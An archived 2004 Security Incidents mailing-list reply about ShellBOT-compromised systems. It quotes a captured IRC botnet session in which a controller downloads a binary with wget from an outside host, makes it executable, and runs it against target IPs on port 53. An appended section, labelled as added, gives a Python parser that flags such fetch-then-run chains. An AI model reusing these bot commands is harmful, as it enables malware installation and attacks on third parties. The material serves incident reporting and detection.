Security Incidents mailing list archives

Re: Systems compromised with ShellBOT perl script - part 2


From: "nathan c. dickerson" <nathan () pro net>
Date: Thu, 16 Sep 2004 15:47:38 -0700

These are the same guys, using the same exploits that I've dealt with many moons ago.

sly and juntz

same guys, same tricks

make sure you watch your /dev/shm directories..

-> :^sly!~ssly () cedar invision net PRIVMSG #brdata :!atrix killall -9 doze4

<- PRIVMSG #brdata :doze4: no process killed
-> :^sly!~ssly () cedar invision net PRIVMSG #brdata :!atrix cd /tmp
-> :sly36!~ssly () ns30111 ovh net PRIVMSG #brdata :!atrix rm doze4
<- PRIVMSG #brdata :rm: cannot lstat `doze4': No such file or directory
-> :sly36!~ssly () ns30111 ovh net PRIVMSG #brdata :!atrix wget
http://members.lycos.co.uk/gookboy/doze4
<- PRIVMSG #brdata :--13:52:35--  http://members.lycos.co.uk/gookboy/doze4
<- PRIVMSG #brdata :           => `doze4'
<- PRIVMSG #brdata :Resolving members.lycos.co.uk... done.
<- PRIVMSG #brdata :Connecting to
members.lycos.co.uk[212.78.204.20]:80... failed: Connection refused.
-> :sly36!~ssly () ns30111 ovh net PRIVMSG #brdata :!atrix chmod +x doze4
<- PRIVMSG #brdata :chmod: failed to get attributes of `doze4': No such
file or directory
-> :sly36!~ssly () ns30111 ovh net PRIVMSG #brdata :!atrix ./doze4
81.29.36.147 53 www.ibm.com
-> :sly36!~ssly () ns30111 ovh net PRIVMSG #brdata :!atrix killall -9 doze4
-> :sly36!~ssly () ns30111 ovh net PRIVMSG #brdata :!atrix ./doze4
65.248.51.13 53 www.ibm.com
<- PRIVMSG #brdata :sh: line 1: ./doze4: No such file or directory



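The session above shows the bot's command protocol: the controller addresses it in channel with `!atrix <shell command>` and the bot relays whatever the command printed. As an added example (not part of the original post), a small Python parser for that log format that re-joins the mail-wrapped lines, pairs each controller command with the output the bot relayed, and flags a fetch-then-run chain even when, as here, every step failed; the `!atrix` prefix and record layout come from the post, the stage names and the regexes are my own.

```python
import re

# Constructed sample: lines quoted from the captured session above, keeping the
# archive's " () " stand-in for '@' in the hostmask and the mail-client wrapping.
SAMPLE_LOG = """-> :sly36!~ssly () ns30111 ovh net PRIVMSG #brdata :!atrix wget
http://members.lycos.co.uk/gookboy/doze4
<- PRIVMSG #brdata :Connecting to
members.lycos.co.uk[212.78.204.20]:80... failed: Connection refused.
-> :sly36!~ssly () ns30111 ovh net PRIVMSG #brdata :!atrix chmod +x doze4
<- PRIVMSG #brdata :chmod: failed to get attributes of `doze4': No such
file or directory
-> :sly36!~ssly () ns30111 ovh net PRIVMSG #brdata :!atrix ./doze4
81.29.36.147 53 www.ibm.com
<- PRIVMSG #brdata :sh: line 1: ./doze4: No such file or directory"""

# "-> ... :!atrix <cmd>" is the controller addressing the bot; "<- ..." is the bot relaying output.
CMD_RE = re.compile(r"^-> :(?P<nick>[^!]+)!\S+ \(\) .+? PRIVMSG (?P<chan>#\S+) :!atrix (?P<cmd>.+)$")
OUT_RE = re.compile(r"^<- PRIVMSG #\S+ :(?P<text>.*)$")
FAIL_RE = re.compile(r"failed|No such file|no process killed")

def unwrap(text):
    # Re-join lines the mail client wrapped: only "->" or "<-" starts a new record.
    return re.sub(r"\n(?!->|<-)", " ", text).splitlines()

def stage(cmd):
    # Which step of a fetch-then-run chain a shell command represents.
    word = cmd.split()[0]
    return ("download" if word in ("wget", "curl") else "make-executable" if word == "chmod"
            else "execute" if word.startswith("./") else "other")

def parse(text):
    # One record per controller command, with the output the bot relayed back and a failure flag.
    events = []
    for line in unwrap(text):
        if m := CMD_RE.match(line):
            events.append({"issuer": m["nick"], "chan": m["chan"], "cmd": m["cmd"].strip(),
                           "stage": stage(m["cmd"]), "output": [], "failed": False})
        elif (m := OUT_RE.match(line)) and events:
            events[-1]["output"].append(m["text"])
            events[-1]["failed"] |= bool(FAIL_RE.search(m["text"]))
    return events

def fetch_then_run(events):
    # Artifacts both fetched and run; every step failed here, but the chain itself is the signal.
    seen = {}
    for e in (e for e in events if e["stage"] != "other"):
        toks = e["cmd"].split()
        name = (toks[0] if e["stage"] == "execute" else toks[-1]).rsplit("/", 1)[-1]
        seen.setdefault(name, set()).add(e["stage"])
    return sorted(n for n, s in seen.items() if {"download", "execute"} <= s)
```

Pointing `parse` at a longer capture (the bot relays into a channel, so the same records appear in any IRC sniff or bot log) gives one alert per artifact name rather than one per failed command.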